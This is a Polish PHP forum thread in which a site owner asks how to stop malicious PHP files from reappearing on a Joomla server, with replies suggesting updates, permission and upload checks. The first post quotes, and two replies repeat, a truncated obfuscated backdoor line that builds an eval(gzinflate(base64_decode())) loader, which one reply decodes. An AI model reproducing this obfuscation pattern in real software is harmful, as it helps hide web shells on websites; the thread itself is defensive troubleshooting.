Pomoc - Szukaj - Użytkownicy - Kalendarz
Pełna wersja: [PHP]Problem z wirusem lub Joomla
Forum PHP.pl > Forum > Przedszkole
damianoo
28.09.2015, 19:27:44
Witam, ostatnimi czasy mam taki problem. Na moim serwerze gdzie mam strony internetowe na Joomla 2.5 mam poważny problem, samoistnie wgrywają się jakieś pliki, typu dump.php, wp-error.php lub license.php itp. Dostałem od superhostu listę plików zainfekowanych w których były różnego rodzaju zapiski w jakimś dziwnym języku programowania. Niestety problem nadal jest, lecz już nie taki jak był na początku. Jak mogę zabezpieczyć serwer lub strony przed tego typu atakiem? Dodam, że zmieniłem wszystkie hasła itd.

Proszę o pomoc.

Część zawartości jednego z plików, w tym wypadku wp-error.php

[PHP] pobierz, plaintext 
  1. <?php $KE393 = "lr)/m_2x9ac.j;687dkev5nigothsq1u*b(4y3zfw0p";$ZjF4018 = $KE393[42].$KE393[1].$KE393[19].$KE393[24].$KE393[5].$KE393[1].$KE393[19].$KE393[42].$KE393[0].$KE393[9].$KE393[10].$KE393[19];$c1985 = "eva".chr(108)."\x28".chr(103)."\x7a".chr(105)."\x6E".chr(102)."\x6C\x61\x74\x65\x28\x62".chr(97)."s\x65".chr(54)."\x34".chr(95)."dec\x6fd\x65".chr(40)."";$hMpvX6091 = ")".chr(41)."\x29".chr(59)."";$xY4419 =
[PHP] pobierz, plaintext
Rysh
28.09.2015, 19:56:34
Cytat(damianoo @ 28.09.2015, 20:27:44 ) *
Witam, ostatnimi czasy mam taki problem. Na moim serwerze gdzie mam strony internetowe na Joomla 2.5 mam poważny problem, samoistnie wgrywają się jakieś pliki, typu dump.php, wp-error.php lub license.php itp. Dostałem od superhostu listę plików zainfekowanych w których były różnego rodzaju zapiski w jakimś dziwnym języku programowania. Niestety problem nadal jest, lecz już nie taki jak był na początku. Jak mogę zabezpieczyć serwer lub strony przed tego typu atakiem? Dodam, że zmieniłem wszystkie hasła itd.

Proszę o pomoc.

Część zawartości jednego z plików, w tym wypadku wp-error.php

[PHP] pobierz, plaintext 
  1. <?php $KE393 = "lr)/m_2x9ac.j;687dkev5nigothsq1u*b(4y3zfw0p";$ZjF4018 = $KE393[42].$KE393[1].$KE393[19].$KE393[24].$KE393[5].$KE393[1].$KE393[19].$KE393[42].$KE393[0].$KE393[9].$KE393[10].$KE393[19];$c1985 = "eva".chr(108)."\x28".chr(103)."\x7a".chr(105)."\x6E".chr(102)."\x6C\x61\x74\x65\x28\x62".chr(97)."s\x65".chr(54)."\x34".chr(95)."dec\x6fd\x65".chr(40)."";$hMpvX6091 = ")".chr(41)."\x29".chr(59)."";$xY4419 =
[PHP] pobierz, plaintext

Czy Joomla była aktualizowana na bieżąco? Czy dokonywałeś jakichś zmian w silniku, ewentualnie dodawałeś pluginy, skórki? Czy ktoś miał dostęp do serwera poza Tobą? Sprawdź kiedy pliki były modyfikowane ewentualnie tworzone.
KsaR
28.09.2015, 22:05:00
Cytat(damianoo @ 28.09.2015, 20:27:44 ) *
Witam, ostatnimi czasy mam taki problem. Na moim serwerze gdzie mam strony internetowe na Joomla 2.5 mam poważny problem, samoistnie wgrywają się jakieś pliki, typu dump.php, wp-error.php lub license.php itp. Dostałem od superhostu listę plików zainfekowanych w których były różnego rodzaju zapiski w jakimś dziwnym języku programowania. Niestety problem nadal jest, lecz już nie taki jak był na początku. Jak mogę zabezpieczyć serwer lub strony przed tego typu atakiem? Dodam, że zmieniłem wszystkie hasła itd.

Proszę o pomoc.

Część zawartości jednego z plików, w tym wypadku wp-error.php

[PHP] pobierz, plaintext 
  1. <?php $KE393 = "lr)/m_2x9ac.j;687dkev5nigothsq1u*b(4y3zfw0p";$ZjF4018 = $KE393[42].$KE393[1].$KE393[19].$KE393[24].$KE393[5].$KE393[1].$KE393[19].$KE393[42].$KE393[0].$KE393[9].$KE393[10].$KE393[19];$c1985 = "eva".chr(108)."\x28".chr(103)."\x7a".chr(105)."\x6E".chr(102)."\x6C\x61\x74\x65\x28\x62".chr(97)."s\x65".chr(54)."\x34".chr(95)."dec\x6fd\x65".chr(40)."";$hMpvX6091 = ")".chr(41)."\x29".chr(59)."";$xY4419 =
[PHP] pobierz, plaintext

Po zdekodowaniu zmiennych:
Cytat
preg_replaceeval(gzinflate(base64_decode()));

[PHP] pobierz, plaintext 
  1. echo htmlspecialchars($ZjF4018, ENT_QUOTES, 'UTF-8');
  2. echo htmlspecialchars($c1985, ENT_QUOTES, 'UTF-8');
  3. echo htmlspecialchars($hMpvX6091, ENT_QUOTES, 'UTF-8');
[PHP] pobierz, plaintext

Wylacz register_globals jeżeli jest wlaczone.
Dokladniejszej analizy nie mam jak zrobic bo za mało kodu itp, a na Joomli sie nie znam tongue.gifP
Ale zakładam że ten plik jest gdzieś includowany? Bo inaczej bez sensu by był.

Ale, byl podobny przypadek juz tongue.gif:
http://forum.php.pl/index.php?showtopic=24...p;#entry1160065

Czyli tak jak widac twoj wirus chyba nie pelny
( $xY4419 = )
Na tym sie konczy?
robertpiaty
29.09.2015, 09:53:12
Nie pamiętam dokładnie Joomli, ale chyba gdzieś tam jest ustawienie jakie pliki można upload-ować. Sprawdź czy nie masz tam w ustawieniach że można wrzucać pliki PHP. Dodatkowo sprawdź prawa dostępu do folderów - nie powinno być nigdzie 777
damianoo
12.10.2015, 08:25:06
Nie mam nigdzie 777. Wgrywają się jakieś pliki php samoistnie, pomimo zmiany hasła do ftp;/ nie wiem co już mam robić;/

Czy jest jakiś programista który pomoże uporać mi się z problemem? oczywiście zapłacę.

Sprawa wygląda następująco,
Zmieniłem skrypt na Joomla 3.4, nie został ani jeden plik ze starego skryptu. przed wgraniem serwer wyczyściłem, zmieniłem hasła i dziś znów dokonano ataku. W pliku config.php był jakiś dziwny dopisek...
To jest wersja lo-fi głównej zawartości. Aby zobaczyć pełną wersję z większą zawartością, obrazkami i formatowaniem proszę kliknij tutaj.
Invision Power Board © 2001-2025 Invision Power Services, Inc.